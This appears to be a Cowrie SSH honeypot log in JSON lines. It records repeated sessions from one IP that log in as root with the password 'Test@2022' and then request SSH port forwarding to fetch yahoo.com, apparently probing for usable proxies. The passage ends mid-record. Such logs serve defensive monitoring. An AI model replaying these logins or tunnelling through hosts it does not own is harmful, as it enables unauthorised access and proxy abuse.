{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:57:18.376290Z","src_ip":"213.209.150.239","session":"6e66db4e61a3"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:57:18.423504Z","src_ip":"213.209.150.239","session":"6e66db4e61a3"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:57:18.658555Z","src_ip":"213.209.150.239","session":"6e66db4e61a3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":25100,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:25100","sensor":"my-vps","timestamp":"2025-08-26T00:57:18.707849Z","session":"6e66db4e61a3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:18.755248Z","src_ip":"213.209.150.239","session":"6e66db4e61a3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":23489,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:23489","sensor":"my-vps","timestamp":"2025-08-26T00:57:18.889660Z","session":"6e66db4e61a3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:18.936825Z","src_ip":"213.209.150.239","session":"6e66db4e61a3"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:57:18.984838Z","src_ip":"213.209.150.239","session":"6e66db4e61a3"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":59880,"dst_ip":"1.2.3.4","dst_port":22,"session":"f95e092902e9","protocol":"ssh","message":"New connection: 213.209.150.239:59880 (1.2.3.4:22) [session: f95e092902e9]","sensor":"my-vps","timestamp":"2025-08-26T00:57:19.030954Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:57:19.031738Z","src_ip":"213.209.150.239","session":"f95e092902e9"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:57:19.078503Z","src_ip":"213.209.150.239","session":"f95e092902e9"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:57:19.312668Z","src_ip":"213.209.150.239","session":"f95e092902e9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":14282,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:14282","sensor":"my-vps","timestamp":"2025-08-26T00:57:19.360436Z","session":"f95e092902e9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:19.407480Z","src_ip":"213.209.150.239","session":"f95e092902e9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":19057,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:19057","sensor":"my-vps","timestamp":"2025-08-26T00:57:19.545508Z","session":"f95e092902e9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:19.592662Z","src_ip":"213.209.150.239","session":"f95e092902e9"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:57:19.640706Z","src_ip":"213.209.150.239","session":"f95e092902e9"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":59920,"dst_ip":"1.2.3.4","dst_port":22,"session":"c6c3ffa50a61","protocol":"ssh","message":"New connection: 213.209.150.239:59920 (1.2.3.4:22) [session: c6c3ffa50a61]","sensor":"my-vps","timestamp":"2025-08-26T00:57:19.696643Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:57:19.697608Z","src_ip":"213.209.150.239","session":"c6c3ffa50a61"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:57:19.754710Z","src_ip":"213.209.150.239","session":"c6c3ffa50a61"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:57:20.037769Z","src_ip":"213.209.150.239","session":"c6c3ffa50a61"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":31683,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:31683","sensor":"my-vps","timestamp":"2025-08-26T00:57:20.095437Z","session":"c6c3ffa50a61"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:20.152451Z","src_ip":"213.209.150.239","session":"c6c3ffa50a61"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":4438,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:4438","sensor":"my-vps","timestamp":"2025-08-26T00:57:20.307228Z","session":"c6c3ffa50a61"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:20.363979Z","src_ip":"213.209.150.239","session":"c6c3ffa50a61"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:57:20.422950Z","src_ip":"213.209.150.239","session":"c6c3ffa50a61"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":59970,"dst_ip":"1.2.3.4","dst_port":22,"session":"4ea75091f508","protocol":"ssh","message":"New connection: 213.209.150.239:59970 (1.2.3.4:22) [session: 4ea75091f508]","sensor":"my-vps","timestamp":"2025-08-26T00:57:20.468748Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:57:20.469492Z","src_ip":"213.209.150.239","session":"4ea75091f508"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:57:20.516912Z","src_ip":"213.209.150.239","session":"4ea75091f508"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:57:20.751319Z","src_ip":"213.209.150.239","session":"4ea75091f508"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":8984,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:8984","sensor":"my-vps","timestamp":"2025-08-26T00:57:20.799123Z","session":"4ea75091f508"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:20.846467Z","src_ip":"213.209.150.239","session":"4ea75091f508"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":31676,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:31676","sensor":"my-vps","timestamp":"2025-08-26T00:57:20.985462Z","session":"4ea75091f508"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:21.032670Z","src_ip":"213.209.150.239","session":"4ea75091f508"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:57:21.080566Z","src_ip":"213.209.150.239","session":"4ea75091f508"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":60020,"dst_ip":"1.2.3.4","dst_port":22,"session":"9ca37e41e092","protocol":"ssh","message":"New connection: 213.209.150.239:60020 (1.2.3.4:22) [session: 9ca37e41e092]","sensor":"my-vps","timestamp":"2025-08-26T00:57:21.136483Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:57:21.137373Z","src_ip":"213.209.150.239","session":"9ca37e41e092"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:57:21.193881Z","src_ip":"213.209.150.239","session":"9ca37e41e092"}
{"eventid":"cowrie.session.closed","duration":"301.4","message":"Connection lost after 301.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:57:21.397156Z","src_ip":"212.227.235.229","session":"28fbe0ba0795"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:57:21.477046Z","src_ip":"213.209.150.239","session":"9ca37e41e092"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":27017,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:27017","sensor":"my-vps","timestamp":"2025-08-26T00:57:21.534834Z","session":"9ca37e41e092"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:21.591593Z","src_ip":"213.209.150.239","session":"9ca37e41e092"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":27279,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:27279","sensor":"my-vps","timestamp":"2025-08-26T00:57:21.747043Z","session":"9ca37e41e092"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:21.803754Z","src_ip":"213.209.150.239","session":"9ca37e41e092"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:57:21.861171Z","src_ip":"213.209.150.239","session":"9ca37e41e092"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":60074,"dst_ip":"1.2.3.4","dst_port":22,"session":"eac13320d7bb","protocol":"ssh","message":"New connection: 213.209.150.239:60074 (1.2.3.4:22) [session: eac13320d7bb]","sensor":"my-vps","timestamp":"2025-08-26T00:57:21.907465Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:57:21.908142Z","src_ip":"213.209.150.239","session":"eac13320d7bb"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowf